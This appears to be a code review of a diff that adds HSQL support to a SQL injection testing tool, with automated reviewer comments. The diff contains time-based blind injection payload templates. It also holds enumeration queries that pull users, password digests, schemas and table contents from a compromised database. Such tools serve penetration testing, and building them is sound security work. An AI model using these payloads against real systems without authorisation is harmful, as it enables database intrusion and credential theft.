<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- End of time-based blind tests - Parameter replace -->
@ -3389,6 +3633,47 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
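Review bot: The `CRYPT_KEY`-based payloads carry `<dbms_version>&gt; 2.0</dbms_version>` in the time-based blind tests but `&gt;= 2.0` in the stacked-queries test at the top of this section, and the fingerprint module in this commit sets `>= 2.0.0`; one of the two bounds is wrong, and the strict one excludes exactly-2.0 targets from the blind tests. The `REPEAT` counts also differ between otherwise parallel entries (`[SLEEPTIME]00000000` in the stacked and 2.0 tests, `[SLEEPTIME]000000000` in the 1.7.2 AND/OR tests), which looks accidental; a comment explaining the difference or a unified value would avoid future confusion. The `<!-- Untested -->` marker above the parameter-replace tests does not say what could not be verified; expand it, e.g. `<!-- Untested: not run against a live HSQL instance; syntax derived from the stacked-queries tests above -->`.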


@ -625,4 +625,71 @@
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
</search_column>
</dbms>
<!-- HSQL (Based on MYSQL)-->
<dbms value="HyperSQL">
<cast query="CAST(%s AS LONGVARCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query=","/>
<limit query="LIMIT %d %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="/*" query3="//"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<case query="(CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<hex query="RAWTOHEX(%s)"/>
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
<banner query="DATABASE_VERSION()"/>
<current_user query="CURRENT_USER"/>
<current_db query="DATABASE()"/>
<hostname query=""/>
<is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
<check_udf/>
<users>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
</users>
<passwords>
<!-- Passwords only shown in later versions &gt;=2.0 -->
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
</passwords>
<privileges/>
<roles/>
<dbs>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
</dbs>
<tables>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
</tables>
<columns>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
</search_db>
<search_table>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
</search_table>
<search_column>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column>
</dbms>
</root>
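Review bot: The `<columns>` element mixes two catalog conventions: `query` uses `INFORMATION_SCHEMA.SYSTEM_COLUMNS` with `table_schem`, while `query2` and `count` use `INFORMATION_SCHEMA.COLUMNS` with `table_schema` and `column_type`, the MySQL naming the rest of this block avoids; the inband query in the same element reports the type as `type_name`, so `query2` should presumably be `SELECT type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'` with `count` adjusted the same way. The `<dbs>` blind `count` uses `COUNT(table_schem)` while its `query` uses `DISTINCT(table_schem)`, so the count may exceed the rows the enumeration can fetch. `<hostname query=""/>` is empty, and `<users>`/`<is_dba>` read a `user` column while `<passwords>` reads `user_name`; the comment `<!-- Passwords only shown in later versions &gt;=2.0 -->` hints at a version split that should be stated explicitly next to each query.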